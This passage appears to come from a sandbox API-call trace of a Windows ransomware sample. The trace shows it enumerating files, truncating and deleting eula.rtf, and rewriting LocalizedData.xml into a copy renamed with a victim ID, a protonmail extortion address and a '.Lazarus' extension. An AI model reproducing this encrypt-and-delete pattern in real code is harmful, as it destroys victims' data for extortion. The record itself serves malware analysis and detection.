hHeap=0x20000) returned 1 [0067.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0067.897] CloseHandle (hObject=0x410) returned 1 [0067.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0067.898] CloseHandle (hObject=0x420) returned 1 [0067.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0067.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0067.899] AreFileApisANSI () returned 1 [0067.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0067.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x694e0 [0067.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x694e0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 36 [0067.899] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0067.900] GetFileType (hFile=0x420) returned 0x1 [0067.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x694e0 | out: hHeap=0x20000) returned 1 [0067.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0067.901] GetLastError () returned 0xb7 [0067.901] SetLastError (dwErrCode=0xb7) [0067.901] WriteFile (in: hFile=0x420, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0067.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0067.902] CloseHandle (hObject=0x420) returned 1 [0067.902] AreFileApisANSI () returned 1 [0067.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0067.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0067.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041\\eula.rtf") returned 36 [0067.902] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf")) returned 1 [0067.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0067.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0067.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0067.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0067.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0067.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0067.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0067.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0067.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5d0 | out: hHeap=0x20000) returned 1 [0067.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5b8 | out: hHeap=0x20000) returned 1 [0067.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0067.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8be28 | out: hHeap=0x20000) returned 1 [0067.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0067.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0067.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0067.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0067.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0067.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0067.904] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.904] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.904] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x10a82, dwReserved0=0x1, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0067.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0067.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0067.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0067.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0067.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0067.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0067.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0067.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0067.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0067.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0067.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0067.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0067.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0067.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0067.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0067.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0067.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0067.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0067.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0067.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0067.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0067.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0067.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0067.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0067.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0067.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0067.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0067.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0067.905] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.905] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.905] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.905] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0067.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0067.905] AreFileApisANSI () returned 1 [0067.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0067.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0067.905] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.905] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0067.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0067.905] AreFileApisANSI () returned 1 [0067.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0067.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71ca0 [0067.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 45 [0067.906] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0067.907] GetFileType (hFile=0x420) returned 0x1 [0067.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0067.907] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0067.907] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0067.907] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0067.907] CloseHandle (hObject=0x420) returned 1 [0067.908] AreFileApisANSI () returned 1 [0067.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0067.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71bd0 [0067.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x71bd0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 45 [0067.908] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0067.908] GetFileType (hFile=0x420) returned 0x1 [0067.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0067.908] CloseHandle (hObject=0x420) returned 1 [0067.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0067.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0067.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0067.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0067.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0067.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0067.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0067.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0067.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0067.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0067.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0067.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0067.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0067.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0067.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0067.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0067.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0067.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0067.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0067.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0067.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0067.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0067.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0067.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0067.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0067.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0067.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0067.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0067.909] AreFileApisANSI () returned 1 [0067.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0067.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a30 [0067.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 45 [0067.909] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x10a82)) returned 1 [0067.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0067.909] AreFileApisANSI () returned 1 [0067.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0067.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0067.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0067.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0067.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0067.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0067.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0067.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0067.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0067.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0067.909] GetLastError () returned 0x0 [0067.909] SetLastError (dwErrCode=0x0) [0067.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e420 [0067.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8c430 [0067.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c170 [0067.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6f0 [0067.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d660 [0067.910] GetLastError () returned 0x0 [0067.910] SetLastError (dwErrCode=0x0) [0067.910] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0067.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0067.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71ca0 [0067.910] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0067.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0067.910] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0067.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0067.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0067.910] AreFileApisANSI () returned 1 [0067.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0067.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x51398 [0067.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=107 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 107 [0067.910] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0067.911] GetFileType (hFile=0x420) returned 0x1 [0067.911] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0067.911] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0067.911] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0067.911] AreFileApisANSI () returned 1 [0067.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0067.911] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x717c0 [0067.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 45 [0067.911] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0067.912] GetFileType (hFile=0x410) returned 0x1 [0067.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0067.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0067.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0067.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0067.912] GetLastError () returned 0x0 [0067.912] SetLastError (dwErrCode=0x0) [0067.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0067.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0067.912] GetLastError () returned 0x0 [0067.912] SetLastError (dwErrCode=0x0) [0067.912] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0067.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0067.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0067.912] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0067.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0067.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d720 [0067.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x85fc0 [0067.914] GetLastError () returned 0x0 [0067.914] SetLastError (dwErrCode=0x0) [0067.914] GetLastError () returned 0x0 [0067.914] SetLastError (dwErrCode=0x0) [0067.915] GetLastError () returned 0x0 [0067.915] SetLastError (dwErrCode=0x0) [0067.915] GetLastError () returned 0x0 [0067.915] SetLastError (dwErrCode=0x0) [0067.915] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.916] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.917] GetLastError () returned 0x0 [0067.917] SetLastError (dwErrCode=0x0) [0067.917] GetLastError () returned 0x0 [0067.917] SetLastError (dwErrCode=0x0) [0067.917] GetLastError () returned 0x0 [0067.917] SetLastError (dwErrCode=0x0) [0067.917] GetLastError () returned 0x0 [0067.917] SetLastError (dwErrCode=0x0) [0067.917] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.917] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.918] GetLastError () returned 0x0 [0067.918] SetLastError (dwErrCode=0x0) [0067.918] GetLastError () returned 0x0 [0067.918] SetLastError (dwErrCode=0x0) [0067.918] GetLastError () returned 0x0 [0067.918] SetLastError (dwErrCode=0x0) [0067.918] GetLastError () returned 0x0 [0067.918] SetLastError (dwErrCode=0x0) [0067.918] ReadFile (in: hFile=0x410, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.918] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, 